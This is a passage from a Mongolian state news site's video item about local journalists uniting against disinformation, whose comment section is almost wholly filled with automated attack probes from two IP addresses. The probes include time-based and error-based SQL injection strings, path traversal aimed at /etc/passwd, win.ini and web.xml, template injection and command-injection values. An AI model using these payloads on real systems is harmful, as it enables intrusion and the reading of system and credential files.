Орон нутгийн сэтгүүлчид хуурамч мэдээллийн эсрэг нэгдэв

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-04-08 17:35:00
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'and(select*from(select+sleep(15))a/**/union/**/select+1)=' 185.234.72.114 544 өдөр

  123456
 • admin'and(select*from(select+sleep(14))a/**/union/**/select+1)=' 185.234.72.114 544 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 544 өдөр

  123456
 • admin"and"b"="t 185.234.72.114 544 өдөр

  123456
 • admin"and"w"="w 185.234.72.114 544 өдөр

  123456
 • admin'and'e'='r 185.234.72.114 544 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 544 өдөр

  123456
 • admin'and'w'='w 185.234.72.114 544 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',14)='q
 • admin 185.234.72.114 544 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('f',14)
 • ../../../WEB-INF/web.xml 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
 • ../../WEB-INF/web.xml;admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:14
 • ../../WEB-INF/web.xml 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ../WEB-INF/web.xml;admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:14'/**/
 • ../WEB-INF/web.xml 185.234.72.114 544 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • WEB-INF/web.xml 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(14))::text>'0
 • admin 185.234.72.114 544 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(14))>0/**/
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456"and(select*from(select+sleep(14))a/**/union/**/select+1)="
 • ./../../../../../../Windows/win.ini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../../../../Windows/win.ini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'and(select*from(select+sleep(14))a/**/union/**/select+1)='
 • admin 185.234.72.114 544 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 544 өдөр

  (select*from(select+sleep(14)union/**/select+1)a)
 • admin 185.234.72.114 544 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 544 өдөр

  123456"and"i"="s
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456"and"u"="u
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'and'b'='g
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 544 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456'and'z'='z
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456/**/and+4=8
 • admin 185.234.72.114 544 өдөр

  123456/**/and+4=4
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 544 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 544 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 544 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 544 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 544 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 544 өдөр

  123456
 • <%- 990351714+899727756 %> 185.234.72.114 544 өдөр

  123456
 • #set($c=966974892+883963504)${c}$c 185.234.72.114 544 өдөр

  123456
 • expr 859336379 + 867407898 185.234.72.114 544 өдөр

  123456
 • ${(860114902+811003214)?c} 185.234.72.114 544 өдөр

  123456
 • admin&set /A 843151631+987534324 185.234.72.114 544 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 544 өдөр

  123456
 • ${849184803+888590675} 185.234.72.114 544 өдөр

  123456
 • admin$(expr 825475709 + 890638206) 185.234.72.114 544 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 544 өдөр

  123456
 • /*1*/{{963836935+935309066}} 185.234.72.114 544 өдөр

  123456
 • admin|expr 965837342 + 905339202 185.234.72.114 544 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 544 өдөр

  123456
 • /etc/passwd 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  <%- 884915308+920774292 %>
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 544 өдөр

  123456
 • admin expr 901360854 + 946477149 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  #set($c=910704460+806237544)${c}$c
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  expr 865105440 + 971746414
 • admin 185.234.72.114 544 өдөр

  ${(901800187+993040992)?c}
 • ./../../../../../../etc/passwd 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456&set /A 907116981+822504864
 • ../../../../../../etc/passwdadmin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  ${804146088+876215890}
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456$(expr 925802523 + 854116382)
 • ../../../../../../etc/passwd 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  /*1*/{{826304401+881801884}}
 • qfdwqjsqwhuygrmcccqz 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  qfdwqjsqwhuygrmcccqz
 • '-var_dump(md5(143355959))-' 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456|expr 942854602 + 950262600
 • ${@var_dump(md5(145576773))}; 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  '-var_dump(md5(722294708))-'
 • ${823241135+910224446} 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  ${@var_dump(md5(768963773))};
 • admin 185.234.72.114 544 өдөр

  123456 expr 882407269 + 917622096
 • admin 185.234.72.114 544 өдөр

  ${979829871+953024221}
 • admin 185.234.72.114 544 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 544 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 544 өдөр

  123456
 • admin 185.234.72.114 544 өдөр

  123456
 • <%- 852366035+943774033 %> 194.163.191.42 545 өдөр

  123456
 • #set($c=844113451+968761752)${c}$c 194.163.191.42 545 өдөр

  123456
 • ${(986152895+919505411)?c} 194.163.191.42 545 өдөр

  123456
 • ${850687735+986600031} 194.163.191.42 545 өдөр

  123456
 • /*1*/{{892606294+880818734}} 194.163.191.42 545 өдөр

  123456
 • admin 194.163.191.42 545 өдөр

  <%- 818012206+887752433 %>
 • admin 194.163.191.42 545 өдөр

  #set($c=988110800+841057019)${c}$c
 • admin 194.163.191.42 545 өдөр

  ${(823678502+827776678)?c}
 • admin 194.163.191.42 545 өдөр

  ${813750781+801457320}
 • admin 194.163.191.42 545 өдөр

  /*1*/{{890145035+868452891}}
 • '-var_dump(md5(153350638))-' 194.163.191.42 545 өдөр

  123456
 • ${@var_dump(md5(860267304))}; 194.163.191.42 545 өдөр

  123456
 • admin 194.163.191.42 545 өдөр

  '-var_dump(md5(727247820))-'
 • admin 194.163.191.42 545 өдөр

  ${@var_dump(md5(899125018))};
 • admin 194.163.191.42 545 өдөр

  bypqjikwqqynxqufaluo
 • admin 194.163.191.42 545 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 545 өдөр

  123456
 • admin 194.163.191.42 545 өдөр

  ${840561586+901877839}
 • admin 194.163.191.42 545 өдөр

  123456
 • bypqjikwqqynxqufaluo 194.163.191.42 545 өдөр

  123456
 • admin 194.163.191.42 545 өдөр

  123456
 • admin 194.163.191.42 545 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',12)='g 194.163.191.42 579 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 194.163.191.42 579 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 194.163.191.42 579 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 579 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 194.163.191.42 579 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 579 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 194.163.191.42 579 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 579 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 579 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 194.163.191.42 579 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 579 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 579 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 579 өдөр

  123456
 • admin"and"d"="x 194.163.191.42 579 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 579 өдөр

  123456
 • admin"and"m"="m 194.163.191.42 579 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 579 өдөр

  123456
 • admin'and'k'='x 194.163.191.42 579 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 579 өдөр

  123456
 • admin'and'o'='o 194.163.191.42 579 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',12)='d
 • ../WEB-INF/web.xml 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x
 • admin 194.163.191.42 579 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('r',12)
 • WEB-INF/web.xml;admin 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('p',0)
 • WEB-INF/web.xml 194.163.191.42 579 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • admin 194.163.191.42 579 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 579 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 579 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 194.163.191.42 579 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ../../../../../../Windows/win.ini 194.163.191.42 579 өдөр

  123456
 • admin 194.163.191.42 579 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 194.163.191.42 579 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 579 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • admin 194.163.191.42 579 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 579 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 580 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 580 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 580 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 580 өдөр

  123456"and"p"="c
 • admin 194.163.191.42 580 өдөр

  123456"and"t"="t
 • admin 194.163.191.42 580 өдөр

  123456'and'w'='r
 • admin 194.163.191.42 580 өдөр

  123456'and'f'='f
 • admin 194.163.191.42 580 өдөр

  123456/**/and+4=8
 • admin 194.163.191.42 580 өдөр

  123456/**/and+1=1
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 580 өдөр

  123456
 • admin'"\( 194.163.191.42 580 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 580 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 580 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 580 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1804324289')))>'0 194.163.191.42 580 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 580 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1609399246'))) 194.163.191.42 580 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 580 өдөр

  123456
 • admin/**/and/**/cast(md5('1023271878')as/**/int)>0 194.163.191.42 580 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 580 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1344126489)as/**/int))>'0 194.163.191.42 580 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1710085303))) 194.163.191.42 580 өдөр

  123456
 • /etc/passwd 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  <%- 971380460+891488857 %>
 • admin 194.163.191.42 580 өдөр

  expr 885826383 + 906397484
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 580 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1227690987)))and" 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  #set($c=828863236+842366078)${c}$c
 • admin 194.163.191.42 580 өдөр

  123456&set /A 855651769+892449692
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 580 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1147366597)))and' 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  ${(828209429+990699770)?c}
 • ./../../../../../../etc/passwd 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456'"\(
 • admin 194.163.191.42 580 өдөр

  123456$(expr 958638940 + 937852262)
 • admin 194.163.191.42 580 өдөр

  ${903929350+853025318}
 • admin 194.163.191.42 580 өдөр

  123456|expr 856207082 + 908546623
 • admin 194.163.191.42 580 өдөр

  /*1*/{{979960373+844808110}}
 • ../../../../../../etc/passwdadmin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 580 өдөр

  123456 expr 890737348 + 846730689
 • ../../../../../../etc/passwd 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1517099149')))>'0
 • admin 194.163.191.42 580 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1411332475')))
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456/**/and/**/cast(md5('1953238778')as/**/int)>0
 • admin 194.163.191.42 580 өдөр

  123456
 • <%- 868285428+850860712 %> 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456'and(select'1'from/**/cast(md5(1851069865)as/**/int))>'0
 • #set($c=933901503+927914862)${c}$c 194.163.191.42 580 өдөр

  123456
 • '-var_dump(md5(965971709))-' 194.163.191.42 580 өдөр

  123456
 • ${@var_dump(md5(360948548))}; 194.163.191.42 580 өдөр

  123456
 • ${(966447504+809473983)?c} 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  '-var_dump(md5(507711814))-'
 • admin 194.163.191.42 580 өдөр

  extractvalue(1,concat(char(126),md5(1412073833)))
 • ${929737003+942565339} 194.163.191.42 580 өдөр

  123456
 • expr 820739747 + 839829772 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1258511261)))and"
 • admin 194.163.191.42 580 өдөр

  ${@var_dump(md5(619857048))};
 • admin 194.163.191.42 580 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1020696108)))and'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin&set /A 927276498+891511068 194.163.191.42 580 өдөр

  123456
 • ${972984102+954900404} 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • sxugpqduuiwzrgaiwtzf 194.163.191.42 580 өдөр

  123456
 • admin$(expr 865581871 + 856303874) 194.163.191.42 580 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  sxugpqduuiwzrgaiwtzf
 • admin|expr 811965011 + 838827553 194.163.191.42 580 өдөр

  123456
 • /*1*/{{830343044+876618595}} 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  ${904793377+892134638}
 • admin expr 931721161 + 861710739 194.163.191.42 580 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456
 • admin 194.163.191.42 580 өдөр

  123456